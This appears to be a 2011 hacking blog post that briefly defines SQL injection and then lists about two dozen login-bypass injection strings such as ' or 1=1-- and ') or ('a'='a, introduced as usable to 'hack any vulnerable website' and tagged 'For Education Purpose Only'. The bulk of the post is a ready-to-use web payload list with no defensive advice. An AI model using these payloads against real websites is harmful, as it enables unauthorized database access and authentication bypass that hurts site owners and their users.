These strings can be used to hack any vulnerable website having SQL vulnerability at backend.

What is SQL injection
SQL injection is a technique often used to attack data driven applications. This is done by including portions of SQL statements in an entry field in an attempt to get the website to pass a newly formed rogue SQL command to the database (e.g., dump the database contents to the attacker). SQL injection is a code injection technique that exploits a security vulnerability in an application's software. The vulnerability happens when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and unexpectedly executed. SQL injection is mostly known as an attack vector for websites but can be used to attack any type of SQL database.

' or 0=0 --                                                                                                          
" or 0=0 --                                                                                              
or 0=0 --                                                                                      
' or 'x'='x                                                                                                
" or "x"="x                                                                                              
') or ('x'='x                                                                                          
' or 1=1--                                                                                                    
" or 1=1--                                                                                                    
or 1=1--                                                                                            
' or a=a--                                                                                        
' or 'a'='a                                                                                    
" or "a"="a                                                                                        
' or 0=0 #                                                                                            
" or 0=0 #                                                                                          
or 0=0 #                                                                                            
') or ('a'='a                                                                                                    
") or ("a"="a                                                                                        
hi" or "a"="a                                                                                  
hi" or 1=1 --                                                                                                      
hi' or 1=1 --                                                                                                            
hi' or 'a'='a                                                                                        
hi') or ('a'='a                                                                                  
hi") or ("a"="a                                                                
(For Education Purpose Only).            

Share this post
  • Share to Facebook
  • Share to Twitter
  • Share to Google+
  • Share to Stumble Upon
  • Share to Evernote
  • Share to Blogger
  • Share to Email
  • Share to Yahoo Messenger
  • More...


Have any query then please comment

:) :-) :)) =)) :( :-( :(( :d :-d @-) :p :o :>) (o) [-( :-? (p) :-s (m) 8-) :-t :-b b-( :-# =p~ :-$ (b) (f) x-) (k) (h) (c) cheer


Powered by Blog - Widget
© 2011 StarHackx
Designed by Blog Thiet Ke
Posts RSSComments RSS
Back to top